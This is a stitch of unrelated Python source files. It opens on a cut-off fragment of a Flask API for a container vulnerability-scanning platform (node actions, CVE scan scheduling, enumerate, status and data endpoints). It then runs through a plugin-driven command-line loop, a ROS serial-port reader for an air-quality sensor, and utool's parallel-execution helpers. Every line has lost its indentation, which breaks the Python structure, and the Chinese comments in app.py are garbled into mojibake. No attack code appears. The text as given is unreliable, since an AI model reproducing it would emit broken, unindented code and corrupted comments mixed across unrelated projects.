report_resources = action_args.get("resources", [])
if type(report_resources) != list:
raise InvalidUsage("action_args.resources must be list")
if report_resources:
node_action_details["resources"] = report_resources
report_email = action_args.get("report_email", "")
if report_email:
node_action_details["report_email"] = str(report_email)
report_duration = action_args.get('duration', {})
if report_duration and type(report_duration) != dict:
raise InvalidUsage("action_args.duration must be json")
if report_duration:
duration_number = report_duration.get('number')
duration_time_unit = report_duration.get('time_unit')
if duration_number:
try:
duration_number = int(duration_number)
except ValueError:
raise InvalidUsage("Number should be an integer value.")
if duration_time_unit and duration_time_unit not in constants.TIME_UNIT_MAPPING.keys():
raise InvalidUsage("time_unit should be one of these, month/day/hour/minute")
node_action_details["duration"] = {"number": duration_number,
"time_unit": constants.TIME_UNIT_MAPPING.get(duration_time_unit)}
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
if not registry_images:
raise InvalidUsage("registry_images is required for node_type registry_image")
if not registry_images.get("registry_id") or type(registry_images["registry_id"]) != int:
raise InvalidUsage("registry_id is required in registry_images key")
if not filters and not registry_images.get("image_name_with_tag_list"):
raise InvalidUsage("image_name_with_tag_list is required in registry_images key")
if registry_images.get("image_name_with_tag_list") and type(
registry_images["image_name_with_tag_list"]) != list:
raise InvalidUsage("image_name_with_tag_list must be a list")
for img in registry_images["image_name_with_tag_list"]:
if not img:
raise InvalidUsage("image_name_with_tag_list must not have empty values")
try:
RegistryCredential.query.get(registry_images["registry_id"])
except:
raise InternalError("Failed to get registry credential {}".format(registry_images["registry_id"]))
node_action_details["registry_images"] = registry_images
else:
if not filters and not node_ids:
raise InvalidUsage("node_id_list is required for node_type {0}".format(node_type))
redis_pipe = redis.pipeline()
redis_pipe.hgetall(constants.DF_ID_TO_SCOPE_ID_REDIS_KEY_PREFIX + node_type.upper())
redis_pipe.get(websocketio_channel_name_format(node_type + "?format=deepfence")[1])
redis_resp = redis_pipe.execute()
df_id_to_scope_id_map = redis_resp[0]
if redis_resp[1]:
topology_data_df_format = json.loads(redis_resp[1])
# Temporarily accept scope_id
node_utils = NodeUtils()
node_ids = [node_utils.get_df_id_from_scope_id(scope_id, node_type) for scope_id in node_ids]
node_action_details["node_id_list"] = node_ids
if action in [constants.NODE_ACTION_CVE_SCAN_START, constants.NODE_ACTION_SCHEDULE_CVE_SCAN]:
if node_type not in [constants.NODE_TYPE_HOST, constants.NODE_TYPE_CONTAINER,
constants.NODE_TYPE_CONTAINER_IMAGE, constants.NODE_TYPE_REGISTRY_IMAGE]:
raise InvalidUsage("action {0} not applicable for node_type {1}".format(action, node_type))
scan_types = action_args.get("scan_type", None)
if not scan_types or type(scan_types) != list:
raise InvalidUsage("scan_type is required and it should be list")
if "base" not in scan_types:
scan_types.append("base")
invalid_scan_types = set(scan_types) - set(constants.CVE_SCAN_TYPES)
if invalid_scan_types:
raise InvalidUsage("scan_type has invalid values: {0}".format(", ".join(invalid_scan_types)))
node_action_details["scan_type"] = scan_types
elif action == constants.NODE_ACTION_CVE_SCAN_STOP:
if node_type not in [constants.NODE_TYPE_HOST, constants.NODE_TYPE_CONTAINER,
constants.NODE_TYPE_CONTAINER_IMAGE, constants.NODE_TYPE_REGISTRY_IMAGE]:
raise InvalidUsage("action {0} not applicable for node_type {1}".format(action, node_type))
elif action in [constants.NODE_ACTION_DOWNLOAD_REPORT, constants.NODE_ACTION_SCHEDULE_SEND_REPORT]:
if not filters:
raise InvalidUsage("filters is required for this action")
if not report_resources:
raise InvalidUsage("resources is required for this action")
if action == constants.NODE_ACTION_SCHEDULE_SEND_REPORT and not report_email:
raise InvalidUsage("report_email is required for schedule_send_report action")
node_action_details_user_activity = deepcopy(node_action_details)
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
# TODO: get the image names
pass
else:
node_names = []
for node_id in node_ids:
try:
node = Node(node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_data_df_format)
if node.name:
node_names.append(node.name)
except:
pass
node_action_details_user_activity["node_id_list"] = node_names
from tasks.user_activity import create_user_activity
create_user_activity.delay(current_user["id"], constants.ACTION_BULK, action,
resources=[node_action_details_user_activity], success=True)
if action in [constants.NODE_ACTION_CVE_SCAN_START]:
from config.app import celery_app
celery_app.send_task(
'tasks.common_worker.common_worker', args=(), queue=constants.CELERY_NODE_ACTION_QUEUE,
kwargs={"action": action, "node_action_details": node_action_details, "task_type": "node_task"})
elif action in [constants.NODE_ACTION_DOWNLOAD_REPORT]:
from tasks.task_scheduler import run_node_task
return run_node_task(action, node_action_details)
elif action in [constants.NODE_ACTION_SCHEDULE_CVE_SCAN, constants.NODE_ACTION_SCHEDULE_SEND_REPORT]:
if not action_args.get("cron"):
raise InvalidUsage("cron is required in action_args key")
if not croniter.is_valid(action_args["cron"]):
raise InvalidUsage("cron is invalid")
node_names = ""
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
node_names = ", ".join(registry_images["image_name_with_tag_list"][:3])
if len(registry_images["image_name_with_tag_list"]) > 3:
node_names += " and more"
else:
tmp_node_names = []
for node_id in node_ids[:3]:
try:
node = Node(node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_data_df_format)
tmp_node_names.append(node.name)
except:
pass
node_names = ", ".join(tmp_node_names)
if len(node_ids) > 3:
node_names += " and more"
try:
check_existing = Scheduler.query.filter_by(action=action, nodes=node_action_details).all()
if check_existing:
raise InvalidUsage("A similar schedule already exists")
scheduled_action = Scheduler(
action=action, description=str(action_args.get("description", "")), cron_expr=action_args["cron"],
nodes=node_action_details, is_enabled=True, node_names=node_names, status="")
scheduled_action.save()
except Exception as exc:
raise DFError("Could not save scheduled task", error=exc)
return set_response("Ok")
return set_response("Ok")
@resource_api.route("/enumerate", methods=["POST"], endpoint="api_v1_5_enumerate")
@jwt_required
def enumerate_node():
"""
Enumerate API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: enumerateNodes
description: Enumerate nodes (hosts, containers, images, processes) with optional filters
parameters:
- in: body
name: Options
description: Options to enumerate nodes
schema:
type: object
properties:
size:
type: integer
default: 10
minimum: 1
maximum: 100000
example: 10
description: The numbers of vulnerabilities to return
sort_by:
type: string
example: name
description: Field to sort by
sort_order:
type: string
example: asc
enum: [asc, desc]
description: Sort order
fields:
type: array
example: ["name"]
description: Respond only selected fields
start_index:
type: integer
minimum: 0
maximum: 99999
example: 0
default: 0
description: The number of items to skip before starting to collect the result set
filters:
description: Filter vulnerabilities by various fields (key value pairs)
type: object
properties:
type:
type: array
uniqueItems: true
description: Types of node
example: ["host"]
items:
type: string
enum: [host, container, container_image, container_by_name, process, process_by_name, pod, kube_controller, kube_service, swarm_service]
pseudo:
type: array
uniqueItems: true
description: Pseudo node or not
example: [false]
items:
type: boolean
enum: [true, false]
kernel_version:
type: array
uniqueItems: true
description: Kernel version (for type `host`)
example: ["4.13.0-1019-gcp #23-Ubuntu SMP Thu May 31 16:13:34 UTC 2018"]
items:
type: string
host_name:
type: array
uniqueItems: true
description: Host names
example: ["dev-1", "dev-2"]
items:
type: string
os:
type: array
uniqueItems: true
description: Operating system (for type `host`)
example: ["linux"]
items:
type: string
local_networks:
type: array
uniqueItems: true
description: Local networks in CIDR format (for type `host`)
example: ["127.0.0.1/8", "172.17.0.1/16"]
items:
type: string
interfaceNames:
type: array
uniqueItems: true
description: Interface names (for type `host`)
example: ["lo", "docker0", "eth0"]
items:
type: string
publicIpAddress:
type: array
uniqueItems: true
description: Public IP of host (for type `host`)
example: ["1.2.3.4"]
items:
type: string
kubernetes_node_type:
type: array
uniqueItems: true
description: kubernetes node type (for type `kube_controller`)
example: ["running"]
items:
type: string
enum: [Deployment, DaemonSet, ReplicaSet, CronJob, StatefulSet]
kubernetes_namespace:
type: array
uniqueItems: true
description: kubernetes namespace (for type `pod`, `kube_controller`, `kube_service`). Empty means all.
example: ["default"]
items:
type: string
enum: [default, "", kube-public, kube-system]
tags:
type: array
uniqueItems: true
description: User defined tags
example: ["prod"]
items:
type: string
container_name:
type: array
uniqueItems: true
description: Container name (for type `container`, `container_image`)
example: ["redis", "mysql"]
items:
type: string
image_name:
type: array
uniqueItems: true
description: Container image names (for type `container`, `container_image`)
example: ["redis:latest", "mysql:latest"]
items:
type: string
pid:
type: integer
minimum: 1
description: Process ID (for type `process`)
example: 1225
ppid:
type: integer
minimum: 1
description: Parent process ID (for type `process`)
example: 1225
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
post_data = request.json
if not post_data:
post_data = {}
return set_response(data=resource.get_enumerate_node_data(post_data))
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/status", methods=["POST"], endpoint="api_v1_5_status_api")
@jwt_required
def status_api():
"""
Status API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: statusApi
description: Get status of a previous request by status_id
parameters:
- in: body
name: Options
description: Options
schema:
type: object
properties:
id:
type: string
description: Status ID which was sent in previous request. If a particular request takes longer, api call will reply a status id. This id should be used to query the status of that particular request. It status is success, it will respond data url where data will be available.
required: true
example: "qwkfjwqfkwqkf"
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
properties:
data_url:
type: string
description: Data API url path
id:
type: string
description: id to use when calling data api
status:
type: string
description: If status is `success`, then data is available
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON in request")
if type(request.json) != dict:
raise InvalidUsage("Request data invalid")
status_id_encoded = request.json.get("id", None)
if not status_id_encoded:
raise InvalidUsage("id is required.")
status_id = json.loads(resource.decrypt(status_id_encoded))
status = getattr(resource, status_id["type"] + "_status")(status_id["params"], status_id["post_data"])
response = {
"id": status_id_encoded,
"status": status
}
if status == "success":
response["data_url"] = "{0}/data".format(constants.API_URL_PREFIX)
return set_response(data=response)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/data", methods=["POST"], endpoint="api_v1_5_data_api")
@jwt_required
def data_api():
"""
Data API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: dataApi
description: Get data of a previous request by status_id
parameters:
- in: body
name: Options
description: Options
schema:
type: object
properties:
id:
type: string
description: Status ID which was sent in previous status api. If a particular request takes longer, api call will reply a status id. This id should be used to query the status of that particular request. It status is success, it will respond data url where data will be available.
required: true
example: "qwkfjwqfkwqkf"
responses:
200:
description: Request success
properties:
data:
type: object
description: Response data
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON in request")
if type(request.json) != dict:
raise InvalidUsage("Request data invalid")
data_id_encoded = request.json.get("id", None)
if not data_id_encoded:
raise InvalidUsage("id is required.")
status_id = json.loads(resource.decrypt(data_id_encoded))
data = getattr(resource, status_id["type"] + "_data")(status_id["params"], status_id["post_data"])
response = {
"id": data_id_encoded,
"data": data,
}
return set_response(data=response)
except Exception as ex:
raise InternalError(str(ex))
|
app.py
|
import json
import shlex
from os import _exit, chdir, getcwd
from re import compile as re_compile
from re import findall, match
from sys import exc_info, path
from traceback import print_exception
from libs.config import custom_get, gget, gset, order_alias, set_namespace, color
from libs.readline import LovelyReadline
from Myplugin import Platform
NUMBER_PATTERN = re_compile(r"^[-+]?\d*(\.?\d+|)$")
STDIN_STREAM = b''
HISTORY = None
HISTORY_POINTER = 0
FROM_HISTORY = False
readline = LovelyReadline()
readline.init({}, {})
"""
api ['main']
history_commands ['main']
leave_message ['main']
namespace ['main']
namespace_folders ['main']
folders_namespace ['main']
root_path ['main']
{platform}.pf ['main']
{platform}.prompt ['main']
{plugin_name}.reverse_alias [namespace]
order_alias [namespace]
special plugin platform:general general commands
special plugin platform:encode Encoders
"""
class Loop_init:
def __init__(self, api: str = "run", init_namespace: str = "main"):
"""
Initialize the loop
Args:
api (str, optional): The name of the entry function that is common to all plugins.. Defaults to "run".
default_namespace (str, optional): Initial namespace. Defaults to "main".
"""
platforms = self.set_platforms()
gset("api", api)
gset("loop", True)
gset("blockexit", False)
gset("namespace", init_namespace)
gset("namespace_folders", platforms)
gset("folders_namespace", {v: k for k, v in platforms.items()})
root_path = gget("root_path")
cwd = getcwd()
chdir(root_path)
# {ๅนณๅฐๅ็งฐ -> ๆไปถ่ทฏๅพ}
for k, v in platforms.items():
pf = import_platform(v, api)
gset(k + ".pf", pf)
# ๅนณๅฐ -> ๅฝไปคๅ่กจ
gset(k + ".wordlist", {"command_wordlist": list(pf.names())})
# ๅนณๅฐ -> {ๅฝไปคๅ็งฐ -> [ๅฝไปคๅๆฐ,]}
gset(k + ".prefix_wordlist", {command: gget(command + ".arg_wordlist", k)
for command in gget(k + ".wordlist")["command_wordlist"]})
general_wordlist = gget("general.wordlist")["command_wordlist"]
for k in platforms.keys(): # ๅพๅ
ถไปๆไปถๅนณๅฐๆทปๅ generalๅนณๅฐ็ๅฝไปคๅ่กจ
if (k == "general"):
continue
wordlist = gget(k + ".wordlist")
wordlist["command_wordlist"] += general_wordlist
# ่ฎพ็ฝฎ่พๅ
ฅๆ็คบ็ฌฆ
for k, v in self.set_prompts().items():
gset(k + ".prompt", v)
chdir(cwd)
def set_platforms(self) -> dict:
return {"main": "main_plugins"}
def set_prompts(self) -> dict:
return {"main": ":>"}
def import_platform(platform_path: str, api: str):
return Platform(platform_path, api, message=True)
def is_numberic(string):
global NUMBER_PATTERN
return True if (len(string) and (isinstance(string, (int, float)) or NUMBER_PATTERN.match(string))) else False
def value_translation(arg):
if is_numberic(arg):
arg = float(arg) if "." in arg else int(arg)
else:
try:
arg = json.loads(arg)
except json.JSONDecodeError:
pass
if (isinstance(arg, str)):
custom_vars = findall("#{(\w+)}", arg)
if (match("#{(\w+)}", arg)):
arg = custom_get(custom_vars[0], arg)
else:
if (not custom_vars):
return arg
for var in custom_vars:
arg = arg.replace("#{%s}" % var, custom_get(var, ''))
return arg
def args_parse(args: list) -> dict:
arg_name = ""
arg_dict = {"": []}
for each in args: # ่งฃๆๅๆฐ
if each.startswith("-"):
if len(each) > 2 and each[1] == "-":
arg_name = each[2:]
elif (is_numberic(each)):
arg_dict[""].append(value_translation(each))
else:
arg_name = each[1:]
arg_dict[arg_name] = True
else:
if arg_name == "":
arg_dict[""].append(value_translation(each))
elif arg_name in arg_dict:
if (arg_dict[arg_name] is True):
arg_dict[arg_name] = value_translation(each)
else:
arg_dict[arg_name] = f"{arg_dict[arg_name]} {value_translation(each)}"
else:
arg_dict[arg_name] = value_translation(each)
if (not len(arg_dict[""])):
del arg_dict[""]
return arg_dict
def sys_exit():
print('\n' + gget("leave_message"))
if (gget("log_filepath")):
gget("log_stdout").log.close()
gget("log_stderr").log.close()
_exit(0)
def loop_main():
"""
run_loop main function
"""
gpf = gget("general.pf")
api = gget("api")
old_namespace = ''
while gget("loop"):
# ่ทๅๅฝๅๅฝๅ็ฉบ้ด
namespace = gget("namespace")
tpf = None
# ่ทๅๅฝๅๅนณๅฐ
npf = gget(f"{namespace}.pf")
# ่ทๅ่ชๅฎไนๅนณๅฐ
cpf = gget("custom.pf")
# ๅฆๆ่ทณๅบๅฝๅๅนณๅฐ๏ผ่ฟๅ
ฅๅ
ถไปๅนณๅฐๆถ๏ผ
if (namespace != old_namespace):
# ๅๅงๅๆฐๅนณๅฐๅฝไปคๅ่กจ
wordlist = gget(namespace + ".wordlist")
# ๅๅงๅๆฐๅนณๅฐ{ๅฝไปคๅ็งฐ -> ๅฝไปคๅๆฐ}
prefix_wordlist = gget(namespace + ".prefix_wordlist")
# ๅๅนถgeneral็ๅๆฐ้จๅ
prefix_wordlist = {**prefix_wordlist, **gget("general.prefix_wordlist")}
# ๅๅงๅreadline
readline.set_wordlist(wordlist)
readline.set_prefix_wordlist(prefix_wordlist)
# ่ฎฐๅฝ
old_namespace = namespace
# --------------------------------------
# ๅคๆญๆฏๅฆๆ้ข่ฝฝๅฝไปค
if (gget("preload_command")):
cmd = gget("preload_command")
gset("preload_command", None, True)
else:
print(gget(f"{namespace}.prompt"), end="", flush=True)
if (gget("raw_input") is True):
cmd = input().strip()
else:
cmd = readline().strip()
# ๅญๅจ่พๅ
ฅ็ๅฝไปคๅผ
gset("raw_command", cmd, True)
# ่ฅ่พๅ
ฅ็ฉบๅผ
if (not cmd):
continue
try:
args = shlex.split(cmd) # ๅๅฒ
except ValueError:
print(color.red("Invalid command"))
continue
# ๅคๆญ่พๅ
ฅ็ๅฝไปคๅผๆๆ ๅๆฐ๏ผ่ทๅ่พๅ
ฅ็ๅฝไปค
if " " in cmd: # ่พๅ
ฅ็ๅฝไปค
order = args[0]
else:
order = cmd
del args[0]
# ๅญๅจ่พๅ
ฅ็ๅฝไปคๅผ็ๅๆฐ
raw_command_args = " ".join(args)
gset("raw_command_args", raw_command_args, True)
order = order_alias(order) # ่งฃๆๅซๅ
# --------------------------------------
# ๅคๆญๅฝไปคๆฏๅฆๅญๅจไบ[ๅฝๅๅนณๅฐ]/[general]/[่ชๅฎไนๅนณๅฐ]
if order in npf: # ๅฝไปคๅญๅจ
tpf = npf
elif order in gpf:
tpf = gpf
elif order in cpf:
tpf = cpf
elif cmd:
print(f'\n{order}: {color.red("Command Not Found")}\n')
if tpf:
debug = gget("DEBUG.LOOP")
try:
arg_dict = args_parse(args) # ่งฃๆๅๆฐ
tpf[order].run(**arg_dict)
except TypeError as e:
exc_type, exc_value, exc_tb = exc_info()
print("[TypeError] %s" % str(e).replace("%s()" % api, "%s()" % order))
if debug:
print_exception(exc_type, exc_value, exc_tb)
except Exception as e:
exc_type, exc_value, exc_tb = exc_info()
print("[%s] %s" % (exc_type.__name__, e))
if debug:
print_exception(exc_type, exc_value, exc_tb)
def run_loop(loop_init_object: Loop_init, leave_message: str = "Bye!"):
"""
run_loop
Args:
loop_init_object (Loop_init): Loop Init class
leave_message (str, optional): The message when you leave. Defaults to 'Bye!'.
"""
from threading import Thread
from time import sleep
set_namespace("main", callback=False if gget("preload_command") else True)
gset("leave_message", leave_message)
t = Thread(target=loop_main)
t.setDaemon(True)
t.start()
while gget("loop"):
try:
sleep(10)
except KeyboardInterrupt:
continue
except EOFError:
break
sys_exit()
|
sensors.py
|
import serial
from threading import Thread
import rospy
from collections import deque
class SEN0233:
def __init__(self):
physicalPort = '/dev/ttyS0'
self.serialPort = serial.Serial(physicalPort)
self.buff = deque(maxlen=4)
def read_most_recent_data(buff: deque):
while True:
if self.serialPort.in_waiting >= 40:
d = self.serialPort.read(40)
CR1 =(d[38]<<8) + d[39]
CR2 = 0
for i in range(38):
CR2 += d[i]
if CR1 == CR2:
PMSa = d[12] # Read PM2.5 High 8-bit
PMSb = d[13] # Read PM2.5 Low 8-bit
PMS = (PMSa<<8)+PMSb # PM2.5 value
FMHDSa = d[28] # Read Formaldehyde High 8-bit
FMHDSb = d[29] # Read Formaldehyde Low 8-bit
FMHDS = (FMHDSa<<8)+FMHDSb # Formaldehyde value
TPSa = d[30] # Read Temperature High 8-bit
TPSb = d[31] # Read Temperature Low 8-bit
TPS = (TPSa<<8)+TPSb # Temperature value
HDSa = d[32] # Read Humidity High 8-bit
HDSb = d[33] # Read Humidity Low 8-bit
HDS = (HDSa<<8)+HDSb # Humidity value
else:
self.serialPort.reset_input_buffer()
PMS = 0
FMHDS = 0
TPS = 0
HDS = 0
buff.append(round(TPS/10, 2))
buff.append(round(HDS/10, 2))
buff.append(round(FMHDS/1000, 3))
buff.append(PMS)
rospy.sleep(0.5)
self.reading_thr = Thread(target=read_most_recent_data, args=(self.buff, ))
self.reading_thr.start()
def data(self) -> dict:
rospy.loginfo("In waiting data: {}".format(self.serialPort.in_waiting))
res = {
"temp_c": self.buff.popleft(),
"humidity": self.buff.popleft(),
"formaldehyde": self.buff.popleft(),
"pm2.5": self.buff.popleft()
}
rospy.loginfo(res)
return res
|
util_parallel.py
|
# -*- coding: utf-8 -*-
"""
Module to executes the same function with different arguments in parallel.
"""
from __future__ import absolute_import, division, print_function
import multiprocessing
from concurrent import futures
# import atexit
# import sys
import signal
import ctypes
import six
import threading
from six.moves import map, range, zip # NOQA
from utool._internal.meta_util_six import get_funcname
from utool import util_progress
from utool import util_arg
from utool import util_inject
from utool import util_cplat
if six.PY2:
# import thread as _thread
import Queue as queue
elif six.PY3:
# import _thread
import queue
util_inject.noinject('[parallel]')
SILENT = util_arg.SILENT
if SILENT:
def print(msg):
pass
# Default number of cores to use when doing parallel processing
__NUM_PROCS__ = util_arg.get_argval(('--nprocs', '--num-procs'), type_=int, default=None)
# If true parallelism is disabled
__FORCE_SERIAL__ = util_arg.get_argflag(
('--utool-force-serial', '--force-serial', '--serial')
)
# FIXME: running tests in IBEIS has errors when this number is low
# Due to the large number of parallel processes running?
__MIN_PARALLEL_TASKS__ = 4
if util_cplat.WIN32:
__MIN_PARALLEL_TASKS__ = 16
def generate2(
func,
args_gen,
kw_gen=None,
ntasks=None,
ordered=True,
force_serial=False,
use_pool=False,
chunksize=None,
nprocs=None,
progkw={},
nTasks=None,
verbose=None,
futures_threaded=True,
timeout=3600,
):
r"""
Interfaces to either multiprocessing or futures.
Esentially maps ``args_gen`` onto ``func`` using pool.imap.
However, args_gen must be a tuple of args that will be unpacked and send to
the function. Thus, the function can take multiple args. Also specifing
keyword args is supported.
Useful for embarrassingly parallel loops. Currently does not work with
opencv3
CommandLine:
python -m utool.util_parallel generate2
Args:
func (function): live python function
args_gen (?):
kw_gen (None): (default = None)
ntasks (None): (default = None)
ordered (bool): (default = True)
force_serial (bool): (default = False)
verbose (bool): verbosity flag(default = None)
CommandLine:
python -m utool.util_parallel generate2
Example:
>>> # DISABLE_DOCTEST
>>> from utool.util_parallel import * # NOQA
>>> from utool.util_parallel import _kw_wrap_worker # NOQA
>>> import utool as ut
>>> args_gen = list(zip(range(10000)))
>>> kw_gen = [{}] * len(args_gen)
>>> func = ut.is_prime
>>> _ = list(generate2(func, args_gen))
>>> _ = list(generate2(func, args_gen, ordered=False))
>>> _ = list(generate2(func, args_gen, force_serial=True))
>>> _ = list(generate2(func, args_gen, use_pool=True))
>>> _ = list(generate2(func, args_gen, futures_threaded=True))
>>> _ = list(generate2(func, args_gen, ordered=False, verbose=False))
Example:
>>> # ENABLE_DOCTEST
>>> import utool as ut
>>> #num = 8700 # parallel is slower for smaller numbers
>>> num = 500 # parallel has an initial (~.1 second startup overhead)
>>> print('TESTING SERIAL')
>>> func = ut.is_prime
>>> args_list = list(range(0, num))
>>> flag_generator0 = ut.generate2(ut.is_prime, zip(range(0, num)), force_serial=True)
>>> flag_list0 = list(flag_generator0)
>>> print('TESTING PARALLEL (PROCESS)')
>>> flag_generator1 = ut.generate2(ut.is_prime, zip(range(0, num)))
>>> flag_list1 = list(flag_generator1)
>>> print('TESTING PARALLEL (THREAD)')
>>> flag_generator2 = ut.generate2(ut.is_prime, zip(range(0, num)), futures_threaded=True)
>>> flag_list2 = list(flag_generator2)
>>> print('ASSERTING')
>>> assert len(flag_list1) == num
>>> assert len(flag_list2) == num
>>> assert flag_list0 == flag_list1
>>> assert flag_list0 == flag_list2
Example:
>>> # ENABLE_DOCTEST
>>> # Trying to recreate the freeze seen in IBEIS
>>> import utool as ut
>>> print('TESTING SERIAL')
>>> flag_generator0 = ut.generate2(ut.is_prime, zip(range(0, 1)))
>>> flag_list0 = list(flag_generator0)
>>> flag_generator1 = ut.generate2(ut.fibonacci_recursive, zip(range(0, 1)))
>>> flag_list1 = list(flag_generator1)
>>> print('TESTING PARALLEL')
>>> flag_generator2 = ut.generate2(ut.is_prime, zip(range(0, 12)))
>>> flag_list2 = list(flag_generator2)
>>> flag_generator3 = ut.generate2(ut.fibonacci_recursive, zip(range(0, 12)))
>>> flag_list3 = list(flag_generator3)
>>> print('flag_list0 = %r' % (flag_list0,))
>>> print('flag_list1 = %r' % (flag_list1,))
>>> print('flag_list2 = %r' % (flag_list1,))
>>> print('flag_list3 = %r' % (flag_list1,))
Example:
>>> # DISABLE_DOCTEST
>>> # UNSTABLE_DOCTEST
>>> # Trying to recreate the freeze seen in IBEIS
>>> try:
>>> import vtool as vt
>>> except ImportError:
>>> import vtool as vt
>>> import utool as ut
>>> from wbia.algo.preproc.preproc_chip import gen_chip
>>> #from wbia.algo.preproc.preproc_feat import gen_feat_worker
>>> key_list = ['grace.jpg', 'easy1.png', 'ada2.jpg', 'easy3.png',
>>> 'hard3.png', 'zebra.png', 'patsy.jpg', 'ada.jpg',
>>> 'carl.jpg', 'lena.png', 'easy2.png']
>>> img_fpath_list = [ut.grab_test_imgpath(key) for key in key_list]
>>> arg_list1 = [(ut.augpath(img_fpath, '_testgen'), img_fpath, (0, 0, 100, 100), 0.0, (545, 372), []) for img_fpath in img_fpath_list[0:1]]
>>> arg_list2 = [(ut.augpath(img_fpath, '_testgen'), img_fpath, (0, 0, 100, 100), 0.0, (545, 372), []) for img_fpath in img_fpath_list]
>>> #arg_list3 = [(count, fpath, {}) for count, fpath in enumerate(ut.get_list_column(arg_list1, 0))]
>>> #arg_list4 = [(count, fpath, {}) for count, fpath in enumerate(ut.get_list_column(arg_list2, 0))]
>>> ut.remove_file_list(ut.get_list_column(arg_list2, 0))
>>> chips1 = [x for x in ut.generate2(gen_chip, arg_list1)]
>>> chips2 = [y for y in ut.generate2(gen_chip, arg_list2, force_serial=True)]
>>> #feats3 = [z for z in ut.generate2(gen_feat_worker, arg_list3)]
>>> #feats4 = [w for w in ut.generate2(gen_feat_worker, arg_list4)]
Example:
>>> # DISABLE_DOCTEST
>>> # FAILING_DOCTEST
>>> # Trying to recreate the freeze seen in IBEIS
>>> # Extremely weird case: freezes only if dsize > (313, 313) AND __testwarp was called beforehand.
>>> # otherwise the parallel loop works fine. Could be an opencv 3.0.0-dev issue.
>>> try:
>>> import vtool as vt
>>> except ImportError:
>>> import vtool as vt
>>> import utool as ut
>>> from wbia.algo.preproc.preproc_chip import gen_chip
>>> import cv2
>>> from utool.util_parallel import __testwarp
>>> key_list = ['grace.jpg', 'easy1.png', 'ada2.jpg', 'easy3.png',
>>> 'hard3.png', 'zebra.png', 'patsy.jpg', 'ada.jpg',
>>> 'carl.jpg', 'lena.png', 'easy2.png']
>>> img_fpath_list = [ut.grab_test_imgpath(key) for key in key_list]
>>> arg_list1 = [(vt.imread(fpath),) for fpath in img_fpath_list[0:1]]
>>> arg_list2 = [(vt.imread(fpath),) for fpath in img_fpath_list]
>>> #new1 = [x for x in ut.generate2(__testwarp, arg_list1)]
>>> new1 = __testwarp(arg_list1[0])
>>> new2 = [y for y in ut.generate2(__testwarp, arg_list2, force_serial=False)]
>>> #print('new2 = %r' % (new2,))
#Example:
# >>> # Freakin weird. When IBEIS Runs generate it doesn't close the processes
# >>> # UNSTABLE_DOCTEST
# >>> # python -m utool.util_parallel --test-generate:4
# >>> # Trying to see if we can recreate the problem where there are
# >>> # defunct python processes
# >>> import utool as ut
# >>> #num = 8700 # parallel is slower for smaller numbers
# >>> num = 70000 # parallel has an initial (~.1 second startup overhead)
# >>> print('TESTING PARALLEL')
# >>> flag_generator1 = list(ut.generate2(ut.is_prime, range(0, num)))
# >>> flag_generator1 = list(ut.generate2(ut.is_prime, range(0, num)))
# >>> import time
# >>> time.sleep(10)
"""
if verbose is None:
verbose = 2
if ntasks is None:
ntasks = nTasks
if ntasks is None:
try:
ntasks = len(args_gen)
except TypeError:
# Cast to a list
args_gen = list(args_gen)
ntasks = len(args_gen)
if ntasks == 1 or ntasks < __MIN_PARALLEL_TASKS__:
force_serial = True
if __FORCE_SERIAL__:
force_serial = __FORCE_SERIAL__
if ntasks == 0:
if verbose:
print('[ut.generate2] submitted 0 tasks')
return
if nprocs is None:
nprocs = min(ntasks, get_default_numprocs())
if nprocs == 1:
force_serial = True
if kw_gen is None:
kw_gen = [{}] * ntasks
if isinstance(kw_gen, dict):
# kw_gen can be a single dict applied to everything
kw_gen = [kw_gen] * ntasks
if force_serial:
for result in _generate_serial2(
func, args_gen, kw_gen, ntasks=ntasks, progkw=progkw, verbose=verbose
):
yield result
else:
if verbose:
gentype = 'mp' if use_pool else 'futures'
fmtstr = '[generate2] executing {} {} tasks using {} {} procs'
print(fmtstr.format(ntasks, get_funcname(func), nprocs, gentype))
if verbose > 1:
lbl = '(pargen) %s: ' % (get_funcname(func),)
progkw_ = dict(freq=None, bs=True, adjust=False, freq_est='absolute')
progkw_.update(progkw)
# print('progkw_.update = {!r}'.format(progkw_.update))
progpart = util_progress.ProgPartial(length=ntasks, lbl=lbl, **progkw_)
if use_pool:
# Use multiprocessing
if chunksize is None:
chunksize = max(min(4, ntasks), min(8, ntasks // (nprocs ** 2)))
try:
pool = multiprocessing.Pool(nprocs)
if ordered:
pmap_func = pool.imap
else:
pmap_func = pool.imap_unordered
wrapped_arg_gen = zip([func] * len(args_gen), args_gen, kw_gen)
res_gen = pmap_func(_kw_wrap_worker, wrapped_arg_gen, chunksize)
if verbose > 1:
res_gen = progpart(res_gen)
for res in res_gen:
yield res
finally:
pool.close()
pool.join()
else:
if futures_threaded:
executor_cls = futures.ThreadPoolExecutor
else:
executor_cls = futures.ProcessPoolExecutor
# Use futures
executor = executor_cls(nprocs)
try:
fs_list = [
executor.submit(func, *a, **k) for a, k in zip(args_gen, kw_gen)
]
fs_gen = fs_list
if not ordered:
fs_gen = futures.as_completed(fs_gen)
if verbose > 1:
fs_gen = progpart(fs_gen)
for fs in fs_gen:
yield fs.result(timeout=timeout)
finally:
executor.shutdown(wait=True)
def _kw_wrap_worker(func_args_kw):
func, args, kw = func_args_kw
return func(*args, **kw)
